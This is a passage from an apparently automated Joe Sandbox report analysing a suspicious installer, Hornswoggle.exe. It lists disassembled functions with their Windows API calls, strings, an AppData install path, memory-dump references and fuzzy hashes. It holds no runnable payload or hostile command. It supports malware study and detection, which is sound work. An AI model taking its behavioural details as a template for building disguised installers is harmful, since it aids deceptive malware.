                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                        Function 0040406A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                        • Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
                                                        • Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                        • Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09

                                                        Non-executed Functions

                                                        Function 004049F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A11
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404A1C
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
                                                        • LoadBitmapA.USER32(0000006E), ref: 00404A79
                                                        • SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
                                                        • DeleteObject.GDI32(00000000), ref: 00404AEF
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404C29
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
                                                        • ShowWindow.USER32(?,00000005), ref: 00404C48
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
                                                        • GlobalFree.KERNEL32(00000000), ref: 00404E28
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
                                                        • ShowWindow.USER32(?,00000000), ref: 00404FC7
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404FD2
                                                        • ShowWindow.USER32(00000000), ref: 00404FD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
                                                        • Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
                                                        • Opcode Fuzzy Hash: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
                                                        • Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58
                                                        Function 00404486 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 004044D5
                                                        • SetWindowTextA.USER32(00000000,?), ref: 004044FF
                                                        • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004045BB
                                                        • lstrcmpiA.KERNEL32(Remove folder: ,Festremser Setup: Completed), ref: 004045ED
                                                        • lstrcatA.KERNEL32(?,Remove folder: ), ref: 004045F9
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B
                                                          • Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650
                                                          • Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                          • Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                          • Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                          • Part of subcall function 004060CE: CharPrevA.USER32(?,?,76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                        • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4
                                                          • Part of subcall function 0040483D: lstrlenA.KERNEL32(Festremser Setup: Completed,Festremser Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                          • Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
                                                          • Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,Festremser Setup: Completed), ref: 004048F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Festremser Setup: Completed$Remove folder: $error
                                                        • API String ID: 2624150263-4222094728
                                                        • Opcode ID: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
                                                        • Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
                                                        • Opcode Fuzzy Hash: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
                                                        • Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69
                                                        Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                        • Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
                                                        • Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                        • Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A
                                                        Function 00404191 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404230
                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
                                                        • GetSysColor.USER32(?), ref: 0040425F
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
                                                        • lstrlenA.KERNEL32(?), ref: 00404280
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404306
                                                        • SendMessageA.USER32(00000000), ref: 00404309
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404334
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404383
                                                        • SetCursor.USER32(00000000), ref: 0040438C
                                                        • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
                                                        • SetCursor.USER32(00000000), ref: 004043AF
                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: N$Remove folder: $\A@$open
                                                        • API String ID: 3615053054-2758328528
                                                        • Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                        • Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
                                                        • Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                        • Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98
                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                        • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                        • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                        • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                        Function 00405BAC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
                                                        • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8
                                                          • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                          • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                        • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
                                                        • wsprintfA.USER32 ref: 00405C23
                                                        • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
                                                        • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405D0C
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13
                                                          • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
                                                          • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                        • String ID: %s=%s$NUL$[Rename]
                                                        • API String ID: 222337774-4148678300
                                                        • Opcode ID: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
                                                        • Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
                                                        • Opcode Fuzzy Hash: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
                                                        • Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD
                                                        Function 004060CE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                        • CharPrevA.USER32(?,?,76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                        Strings
                                                        • *?|<>/":, xrefs: 00406116
                                                        • "C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 0040610A
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004060CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-3968548147
                                                        • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                        • Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
                                                        • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                        • Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D
                                                        Function 004040AF Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040CC
                                                        • GetSysColor.USER32(00000000), ref: 004040E8
